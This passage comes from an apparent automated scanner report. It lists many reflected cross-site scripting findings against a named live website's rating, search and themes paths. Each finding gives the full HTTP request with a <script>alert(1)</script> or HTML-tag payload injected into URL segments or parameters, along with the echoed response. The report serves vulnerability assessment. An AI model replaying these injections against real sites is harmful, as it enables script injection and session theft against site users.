User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16ffc05<script>alert(1)</script>76a51091d8c/rating.php was not found on this server.</p>
...[SNIP]...

2.1299. http://www.resellerbase.com/detail/16/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 61e91<script>alert(1)</script>f0793875037bb04f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/1661e91<script>alert(1)</script>f0793875037bb04f4/rating.php?id=16&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1661e91<script>alert(1)</script>f0793875037bb04f4/rating.php?id=16&rating=5 was not found on this server.</p>
...[SNIP]...

2.1300. http://www.resellerbase.com/detail/16/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4724b<script>alert(1)</script>1d6de266f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/rating.php4724b<script>alert(1)</script>1d6de266f8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/rating.php4724b<script>alert(1)</script>1d6de266f8 was not found on this server.</p>
...[SNIP]...

2.1301. http://www.resellerbase.com/detail/16/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ba833<script>alert(1)</script>c4e289ad819f924e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/16/rating.phpba833<script>alert(1)</script>c4e289ad819f924e?id=16&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/rating.phpba833<script>alert(1)</script>c4e289ad819f924e?id=16&rating=5 was not found on this server.</p>
...[SNIP]...

2.1302. http://www.resellerbase.com/detail/16/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dc89e<script>alert(1)</script>23d8d151edbd46477 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/16/rating.php/dc89e<script>alert(1)</script>23d8d151edbd46477?id=16&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/rating.php/dc89e<script>alert(1)</script>23d8d151edbd46477?id=16&rating=5 was not found on this server.</p>
...[SNIP]...

2.1303. http://www.resellerbase.com/detail/16/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dab93<script>alert(1)</script>09322b1d3cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/rating.php?dab93<script>alert(1)</script>09322b1d3cf=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/rating.php?dab93<script>alert(1)</script>09322b1d3cf=1 was not found on this server.</p>
...[SNIP]...

2.1304. http://www.resellerbase.com/detail/16/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 30cc2<script>alert(1)</script>eb7b339f2a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail30cc2<script>alert(1)</script>eb7b339f2a4/16/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail30cc2<script>alert(1)</script>eb7b339f2a4/16/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1305. http://www.resellerbase.com/detail/16/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c6ece<script>alert(1)</script>514d596f62c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16c6ece<script>alert(1)</script>514d596f62c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16c6ece<script>alert(1)</script>514d596f62c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1306. http://www.resellerbase.com/detail/16/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b39b<script>alert(1)</script>339635f5a7f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/search.php5b39b<script>alert(1)</script>339635f5a7f?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/search.php5b39b<script>alert(1)</script>339635f5a7f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1307. http://www.resellerbase.com/detail/16/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/16/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1148a<a>7e5450d19c3 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/search.php?keyword=search...&Submit3=Search1148a<a>7e5450d19c3&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/search.php?keyword=search...&Submit3=Search1148a<a>7e5450d19c3&opt=2 was not found on this server.</p>
...[SNIP]...

2.1308. http://www.resellerbase.com/detail/16/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/16/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e6554<a>dfea2ab1d90 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/search.php?keyword=search...e6554<a>dfea2ab1d90&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/search.php?keyword=search...e6554<a>dfea2ab1d90&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1309. http://www.resellerbase.com/detail/16/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload aca8c<script>alert(1)</script>e00d97ad994 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/search.php?keyword=search...&Submit3=Search&opt=2&aca8c<script>alert(1)</script>e00d97ad994=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/search.php?keyword=search...&Submit3=Search&opt=2&aca8c<script>alert(1)</script>e00d97ad994=1 was not found on this server.</p>
...[SNIP]...

2.1310. http://www.resellerbase.com/detail/16/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/16/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c6c04<a>3821b8c64db was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/16/search.php?keyword=search...&Submit3=Search&opt=2c6c04<a>3821b8c64db HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/search.php?keyword=search...&Submit3=Search&opt=2c6c04<a>3821b8c64db was not found on this server.</p>
...[SNIP]...

2.1311. http://www.resellerbase.com/detail/16/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bb555<script>alert(1)</script>f67184b910c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailbb555<script>alert(1)</script>f67184b910c/16/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailbb555<script>alert(1)</script>f67184b910c/16/themes/ was not found on this server.</p>
...[SNIP]...

2.1312. http://www.resellerbase.com/detail/16/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25e36<script>alert(1)</script>5e2f7e1580f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1625e36<script>alert(1)</script>5e2f7e1580f/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1625e36<script>alert(1)</script>5e2f7e1580f/themes/ was not found on this server.</p>
...[SNIP]...

2.1313. http://www.resellerbase.com/detail/16/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1ec1<script>alert(1)</script>04f45f39b9a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themesf1ec1<script>alert(1)</script>04f45f39b9a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themesf1ec1<script>alert(1)</script>04f45f39b9a/ was not found on this server.</p>
...[SNIP]...

2.1314. http://www.resellerbase.com/detail/16/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c32ce<script>alert(1)</script>5d7d89ed39e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/?c32ce<script>alert(1)</script>5d7d89ed39e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/?c32ce<script>alert(1)</script>5d7d89ed39e=1 was not found on this server.</p>
...[SNIP]...

2.1315. http://www.resellerbase.com/detail/16/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 881be<script>alert(1)</script>26cc27c95c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail881be<script>alert(1)</script>26cc27c95c1/16/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail881be<script>alert(1)</script>26cc27c95c1/16/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1316. http://www.resellerbase.com/detail/16/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b33b0<script>alert(1)</script>57f927d02c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16b33b0<script>alert(1)</script>57f927d02c1/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16b33b0<script>alert(1)</script>57f927d02c1/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1317. http://www.resellerbase.com/detail/16/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/16/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 14123<script>alert(1)</script>b51a5de0a70 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes14123<script>alert(1)</script>b51a5de0a70/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
